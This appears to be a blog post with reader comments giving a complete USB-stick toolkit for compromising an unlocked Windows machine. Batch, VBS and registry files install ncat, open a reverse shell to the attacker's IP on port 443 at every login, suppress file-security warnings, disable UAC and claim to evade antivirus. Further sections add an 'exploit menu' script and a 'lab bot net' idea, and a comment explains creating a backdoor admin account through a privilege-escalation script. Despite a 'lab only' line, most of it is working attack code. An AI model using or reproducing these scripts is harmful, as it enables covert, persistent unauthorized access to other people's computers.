control – netcat av bypass

Tested with Backtrack 5R1 and Windows 7 Service pack 1 all updates. AV tested AVG 2013 – Nothing found.

This process creates an automated manner for installing netcat and a script that tells netcat to create a connection to your pc each time a user logs in. All Microsoft automated security popups are disabled via the created Disable_Open-File_Security_Warning.reg file.

You can place all of this onto a USB memory stick making it a very portable solution. To work you simply need access to the desired machine. Insert the USB memory stick and click RunMe.bat

Please only use this only in your personal lab environment.
—————————————————–

1. Place a USB memory stick into your PC and create a new folder called ncat
2. Open notepad and create .bat file copy the below down to and including the shutdown command.
Paste into the notepad and save as, select all files, file name = RunMe.bat (location the USB stick directory not the ncat folder.)

NOTE – The multiple drive letters in the RunMe.bat are because Windows will dynamically assign a drive letter. It will try all options in the list till one works. Error reporting is disabled.

—- Start copy below this line ——————

@echo off
robocopy "C:\ncat" "C:\ncat"
robocopy "D:\ncat" "C:\ncat"
robocopy "E:\ncat" "C:\ncat"
robocopy "F:\ncat" "C:\ncat"
robocopy "G:\ncat" "C:\ncat"
robocopy "H:\ncat" "C:\ncat"
robocopy "I:\ncat" "C:\ncat"
robocopy "J:\ncat" "C:\ncat"

copy "C:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "D:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"

regedit /s C:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s D:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s E:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s F:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s G:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s H:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s I:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\ncat\Disable_Open-File_Security_Warning.reg

shutdown -r -t 0

—- Dont copy this line ——————

Auto Batch file called RunMe.bat performs the bellow actions

+ Copies the ncat folder on your usb stick and pasts a the copy to hosts C:\
+ Copies the VBS.vbs script from usb stick to hosts C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
+ Runs the Disable_Open-File_Security_Warning.reg file
+ Reboots the hosts machine.

————————————————————

3. Create the .reg file by opening notepad again. Copy the below and then save as, all files and name as Disable_Open-File_Security_Warning.reg
Note – Save to your USB ncat folder location.

—- Start copy below this line ——————

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

—- Dont copy this line ——————

4. Create the .bat file that will tell ncat to dial back to your remote machine using encrypted port 443.

Note – change Your-IP-Address to example 192.168.1.2
Note 2 – Place the saved .bat into the ncat folder on your USB stick.

Copy the below line into new notepad and save as, all files and name as nc.bat

—- Start copy below this line ——————

C:\ncat\ncat.exe -v Your-IP-Address 443 -e cmd.exe

—- Don’t copy this line ——————

5. Create the .vbs file. This tells the PC to run the nc.bat silently. So no CMD window will open.

Note 2 – Place the save .vbs into the ncat folder on your USB stick.

Copy the below lines into new notepad and save as, all files and name as VBS.vbs

—- Start copy below this line ——————

Set WshShell = CreateObject("WScript.Shell" )
WshShell.Run chr(34) & "C:\ncat\nc.bat" & Chr(34), 0
Set WshShell = Nothing

—- Don’t copy this line ——————

6. So now in your ncat folder on your USB stick you should have the following files.

+ Disable_Open-File_Security_Warning.reg
+ nc.bat
+ VBS.vbs

7. Download nmap-6.01-setup.exe for windows from http://nmap.org/download.html
8. Install nmap to your own Windows machine. And locate the program file folder for it normaly C:\Program Files\Nmap
9. Copy the following files, ssleay32.dll, ncat, libeay32.dll and paste into your USB sticks created folder called ncat.

So now in your ncat folder on your USB stick you should have the following files.

+ Disable_Open-File_Security_Warning.reg
+ nc.bat
+ VBS.vbs
+ ssleay32.dll
+ ncat
+ libeay32.dll

And the usb main directory should have your RunMe.bat file.

——————————————

10. On Backtrack start your nc listener

root@bt:~# nc -lvvp 443
listening on [any] 443 …

——————————————

11. Now try it, find an unlocked Windows 7 machine place your usb stick in and double click RunMe.bat

+ This will copy the ncat folder to the hosts c:\ directory.
+ Copy VBS.vbs to C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
+ Run the Disable_Open-File_Security_Warning.reg file

Now every time the host logsin ncat will create a connection to your host.

12. What you should see.

root@bt:~# nc -lvvp 443
listening on [any] 443 …
Remote-IP-Address: inverse host lookup failed: Unknown server error : Connection timed out
connect to [Local-IP-Address] from (UNKNOWN) [Remote-IP-Address] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

————————————————————

If RunMe.bat fails you can manually move the required files as listed below

1. Move ncat folder to C:\
2. Run Disable_Open-File_Security_Warning reg hack
3. Move VBS script to C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
4. Reboot the machine.

————————————————————

Below is not required but some may want to place the reg back.

Reg file to re Enable_Open-File_Security_Warning (So you can undo the changes by runing Disable_Open-File_Security_Warning)

1. Open Note pad.
2. Copy the below and then save as all files and name as Enable_Open-File_Security_Warning.reg

—- Start copy below this line ——————

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

—- Don’t copy this line ——————

Notes

1. Tried against a fully patched brand new Windows 7 build with UAC turned on. Script worked but netcat requested MSVCR100.dll
Once added to the ncat folder it worked.

2. Had a problem with the robocopy “D:\ncat” “C:\ncat” (error said timing wait 30 sec) Found issue was because there was a CD in the D:| drive and it tried to access it.
Fix delete any potential drive letters that maybe used for cd’s or DVD’s. Or before run script open all cd drives?

3. New .bat file idea for menu to deliver different exploits. Work in progress but menu working!

—- Don’t copy this line ——————

ECHO OFF
CLS
:MENU

ECHO.
ECHO ...............................................
ECHO.
ECHO MyExploit Presents
ECHO.
ECHO PRESS 1, 2 OR 3 to select your Exploit, or 4 to EXIT.
ECHO.
ECHO ...............................................
ECHO.
ECHO 1 - Open Notepad
ECHO 2 - Open Calculator
ECHO 3 - Open MS-Paint
ECHO 4 - EXIT
ECHO.

SET /P M=Type 1, 2, 3, or 4 then press ENTER:
IF %M%==1 GOTO NOTE
IF %M%==2 GOTO CALC
IF %M%==3 GOTO MSPaint
IF %M%==4 GOTO EOF

:NOTE
cd %windir%\system32\notepad.exe
start notepad.exe
GOTO MENU

:CALC
cd %windir%\system32\calc.exe
start calc.exe
GOTO MENU

:MSPaint
cd %windir%\system32\mspaint.exe
start mspaint.exe
GOTO MENU

—- Don’t copy this line ——————

Update

—- Don’t copy this line ——————

ECHO OFF
CLS
:MENU

ECHO.
ECHO ...............................................
ECHO.
ECHO MyExploit Presents
ECHO.
ECHO PRESS 1, 2 OR 3 to select your Exploit, or 4 to EXIT.
ECHO.
ECHO ...............................................
ECHO.
ECHO 1 - Run Win7 Exploit
ECHO 2 - Open Calculator
ECHO 3 - Run Winxp Exploit
ECHO 4 - Reboot
ECHO 5 - EXIT
ECHO.

SET /P M=Type 1, 2, 3, or 4 then press ENTER:
IF %M%==1 GOTO Win7
IF %M%==2 GOTO CALC
IF %M%==3 GOTO winxp
IF %M%==4 GOTO reboot
IF %M%==5 GOTO EOF

:Win7
@echo off
robocopy "C:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

robocopy "E:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "F:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "G:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "H:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "I:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "J:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

copy "C:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "D:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"

regedit /s C:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s D:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s E:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s F:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s G:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s H:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s I:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
GOTO MENU

:winxp
@echo off
echo d | xcopy "C:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "E:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "F:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "G:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "H:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "I:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "J:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"

copy "C:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"

regedit /s C:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s E:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s F:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s H:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s I:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
GOTO MENU

:CALC
cd %windir%\system32\calc.exe
start calc.exe
GOTO MENU

:reboot
shutdown -r -t 0

—- Don’t copy this line ——————

Lab bot net idea. It is possible to have multiple machines connect back just open more terminals and add

root@bt:~# nc -lvvp 443

Below two machines connecting back at once one Win 7 the other Win xp both with AVG AV on them.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 6.1.7600]

C:\Windows\system32>systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7600 N/A Build 7600

——————————————

C:\Documents and Settings\Test-PC>ver
ver

Microsoft Windows XP [Version 5.1.2600]

C:\Documents and Settings\Test-PC>systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600

——————– Update —————-

ECHO OFF
CLS
:MENU

ECHO.
ECHO ...............................................
ECHO.
ECHO MyExploit Presents
ECHO.
ECHO PRESS 1 - 10 to select your Exploit, or 10 to EXIT.
ECHO.
ECHO ...............................................
ECHO.
ECHO 1 - Run Win7 Exploit.
ECHO 2 - Run Winxp Exploit.
ECHO 3 - Disable Win7 users Warnings. None UAC warnings!
ECHO 4 - Disable Win7 UAC. You need to run this option twice.
ECHO 5 - Enable Win7 UAC. You need to run this option twice.
ECHO 9 - Reboot.
ECHO 10 - EXIT
ECHO.

SET /P M=Type 1, 2, 3, or 4 then press ENTER:
IF %M%==1 GOTO Win7
IF %M%==2 GOTO winxp
IF %M%==3 GOTO warnings
IF %M%==4 GOTO uac
IF %M%==5 GOTO uac-on
IF %M%==9 GOTO reboot
IF %M%==10 GOTO EOF

:Win7
@echo off

:: BatchGotAdmin elevate rights!
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

"%temp%\getadmin.vbs"
exit /B

:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------

@echo off
robocopy "C:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

robocopy "E:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "F:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "G:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "H:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "I:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "J:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

copy "C:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "D:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
ECHO.
GOTO MENU

:uac
@echo off

:: BatchGotAdmin elevate rights!
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

"%temp%\getadmin.vbs"
exit /B

:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
ECHO.
GOTO MENU

:uac-on
@echo off

:: BatchGotAdmin elevate rights!
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

"%temp%\getadmin.vbs"
exit /B

:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
ECHO.
GOTO MENU

:winxp
@echo off
echo d | xcopy "C:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "E:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "F:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "G:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "H:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "I:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "J:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"

copy "C:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"

regedit /s C:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s E:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s F:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s H:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s I:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg
ECHO.
GOTO MENU

:warnings
@ECHO OFF
If exist "%Temp%\~import.reg" (
Attrib -R -S -H "%Temp%\~import.reg"
del /F /Q "%Temp%\~import.reg"
If exist "%Temp%\~import.reg" (
Echo Could not delete file "%Temp%\~import.reg"
Pause
)
)
> "%Temp%\~import.reg" ECHO Windows Registry Editor Version 5.00
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
>> "%Temp%\~import.reg" ECHO "SaveZoneInformation"=dword:00000001
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
>> "%Temp%\~import.reg" ECHO "LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
>> "%Temp%\~import.reg" ECHO "SaveZoneInformation"=-
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
>> "%Temp%\~import.reg" ECHO "LowRiskFileTypes"=-
START /WAIT REGEDIT /S "%Temp%\~import.reg"
DEL "%Temp%\~import.reg"
ECHO.
GOTO MENU

:reboot
shutdown -r -t 0

Advertisements

9 thoughts on “control – netcat av bypass

  1. Hi Thanassis

    Note all of the above codes are only the start of a project that could take months to complete. We will update each finding as we go along. As example were coming to the conclusion that its not worth disabling UAC.

    You don’t need to turn off UAC to run netcat. I turn it off because it warns me that I’m trying to install something. It does not stop you from doing this and once installed it no longer warns you!

    If you want to delete it any way. The below will work. For more info find :uac in the scripts above. This includes the reg and the file to try and elevate your rights.

    ##### Don’t copy this line ###########

    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

    ##### Don’t copy this line ###########

    More important warnings to stop are the ones that pop up each time netcat runs. Not UAC warnings. These can be deleted by running below.

    @ECHO OFF
    If exist “%Temp%\~import.reg” (
    Attrib -R -S -H “%Temp%\~import.reg”
    del /F /Q “%Temp%\~import.reg”
    If exist “%Temp%\~import.reg” (
    Echo Could not delete file “%Temp%\~import.reg”
    Pause
    )
    )
    > “%Temp%\~import.reg” ECHO Windows Registry Editor Version 5.00
    >> “%Temp%\~import.reg” ECHO.
    >> “%Temp%\~import.reg” ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
    >> “%Temp%\~import.reg” ECHO “SaveZoneInformation”=dword:00000001
    >> “%Temp%\~import.reg” ECHO.
    >> “%Temp%\~import.reg” ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
    >> “%Temp%\~import.reg” ECHO “LowRiskFileTypes”=”.avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;”
    >> “%Temp%\~import.reg” ECHO.
    >> “%Temp%\~import.reg” ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
    >> “%Temp%\~import.reg” ECHO “SaveZoneInformation”=-
    >> “%Temp%\~import.reg” ECHO.
    >> “%Temp%\~import.reg” ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
    >> “%Temp%\~import.reg” ECHO “LowRiskFileTypes”=-
    START /WAIT REGEDIT /S “%Temp%\~import.reg”
    DEL “%Temp%\~import.reg”

  2. Also this early scripts only work if you find an unlocked Admin session. Now I understand this sounds unlikely but as example. Any IT department will run as administrator also most home users do.

  3. What I understand is that most of what you are describing will work only if you execute through cmd which you have already opened as administrator. This means that you already faced UAC message.
    If you do not “run as administrator” cmd then all following commands will fail due to missing privileges.
    Maybe I am missing something here.

  4. Hi Thanassis your not missing anything at all. Yep were hitting the lab box’s with open admin privs. Were finding UAC only informs you does not restrict you.

    This is concept idea what can you do in seconds if you find an unlocked pc. Well if you have seconds and an unlocked pc with this script you can fully compromise it.

    I know what your thinking whats the chance of finding an unlocked pc with full admin rights. Well high in any IT environment. We get asked to pentest a lot of companies and some of which are IT places that offer there support teams full admin rights!

    The main point is having another tool prepared that may be of use at the right time is a positive thing.

    If your looking for remote exploit that will elevate your rights sorry this is not it. Look to metasploit

  5. Just for not yes this script runs through cmd but as its a batch file it will run this for you within secounds. We timed and from pluging the usb stick into to full compromise took under 6 secounds.

  6. Hi Thanassis noticed a good site with regards to gaining admin from guest account.

    http://vishnuvalentino.com/tips-and-trick/privilege-escalation-from-guest-to-administrator-windows7-windows2008/

    You need to edit it right click edit and search for ADD change the

    a.WriteLine (“net localgroup administrators /add v4l.wsf”)

    to

    a.WriteLine (“net localgroup administrators /add test123”)

    Then save and run using

    C:\Users\user\Desktop\Exploit3\ncat\cscript v41.wsf

    Or if you getting into the script idea

    :Elevate
    cd C:\Users\user\Desktop\Exploit3\ncat\
    cscript v4l.wsf
    ECHO.
    GOTO MENU

    Log out and find new created admin account

    username = test123
    password = test123

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s